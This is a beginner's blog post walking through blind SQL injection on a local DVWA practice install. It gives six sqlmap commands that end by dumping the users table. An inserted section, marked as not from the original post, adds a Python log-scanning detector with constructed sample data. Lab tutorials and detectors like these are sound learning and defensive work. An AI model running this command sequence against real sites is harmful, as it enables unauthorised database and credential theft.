My Way of Learning (1): Blind SQL Injection

Source: Internet
Author: User

This is my way of learning. I am starting from zero and am a beginner, so experts, please criticize! This article is a collation of my own thoughts, for reference only.

Log in to DVWA and first set the level to low under DVWA Security. Then open SQL Injection (Blind), enter any number and capture the request to find the injectable URL and the cookie. (The tool used for the capture is Fiddler; the capture process is not covered in detail here.)



Then open a cmd prompt and enter the commands:

The first step is to check whether the URL can be injected. The command is as follows:

sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6"

The -u parameter specifies the URL, and --cookie="cookie value" supplies the session cookie.


The result shows that the parameter is injectable.

The second step is to view all the databases:

sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" --dbs


The third step is to view the current user:

sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" --current-user


The fourth step is to view all the tables in the database DVWA:

sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" -D dvwa --tables


The fifth step is to view the users table in the database, where --columns lists all columns of the specified table:

sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" -D dvwa -T users --columns


After the previous steps you may be running out of patience, haha, but when the results come out there is still a sense of accomplishment. The sixth and last step: --dump dumps the data for all columns.

sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" -D dvwa -T users --dump


Of course, the last screenshot does not show the complete output, you can continue to enter the!!
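What a run like the six steps above looks like from the server side, as an added example that is not part of the original post: a Python scan of a web access log for clients that repeatedly send SQL-like values in the numeric id parameter. The Apache combined log format, the IP addresses, the sample lines and the make_line helper are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: ip - - [time] "METHOD uri PROTO" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
# SQL syntax that has no place in a numeric id parameter.
SQL_RE = re.compile(r"(?i)'|\b(and|or|union|select|sleep|benchmark|information_schema)\b")


def scan(lines, param="id", threshold=3):
    """Return {client_ip: {"hits": n, "tool_ua": bool}} for clients that sent at
    least `threshold` requests whose `param` value is non-numeric and SQL-like."""
    stats = defaultdict(lambda: {"hits": 0, "tool_ua": False})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess
        ip, uri, ua = m.groups()
        # parse_qs percent-decodes, so encoded quotes and spaces are seen in the clear.
        values = parse_qs(urlsplit(uri).query, keep_blank_values=True).get(param, [])
        if any(not v.isdigit() and SQL_RE.search(v) for v in values):
            stats[ip]["hits"] += 1
            # Supporting signal only: the client chooses its own User-Agent.
            stats[ip]["tool_ua"] |= ua.lower().startswith("sqlmap/")
    return {ip: s for ip, s in stats.items() if s["hits"] >= threshold}


def make_line(ip, query, ua):
    """Build one constructed combined-format log line for the DVWA blind page."""
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/'
            f'sqli_blind/?{query} HTTP/1.1" 200 4500 "-" "{ua}"')


TOOL_UA = "sqlmap/1.0 (https://sqlmap.org)"  # constructed; version is a placeholder
BOOL_TEST = "id=1%27%20AND%20{}%3D{}%20AND%20%27x%27%3D%27x&Submit=Submit"
SAMPLE = [  # constructed sample data, not captured from a real server
    make_line("10.0.0.5", "id=1&Submit=Submit", "Mozilla/5.0"),
    make_line("10.0.0.5", "id=abc&Submit=Submit", "Mozilla/5.0"),
    make_line("10.0.0.9", BOOL_TEST.format(4821, 4821), TOOL_UA),
    make_line("10.0.0.9", BOOL_TEST.format(4821, 7736), TOOL_UA),
    make_line("10.0.0.9", BOOL_TEST.format(3310, 3310), TOOL_UA),
]

if __name__ == "__main__":
    for ip, s in scan(SAMPLE).items():
        print(f"{ip}: {s['hits']} SQL-like id values, sqlmap User-Agent: {s['tool_ua']}")
```

The parameter check is the primary signal; the User-Agent match only adds confidence when it is present.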


This article is from the "learning Journey Ideas to organize" blog, please be sure to keep this source http://pieshusheng.blog.51cto.com/13106113/1946399
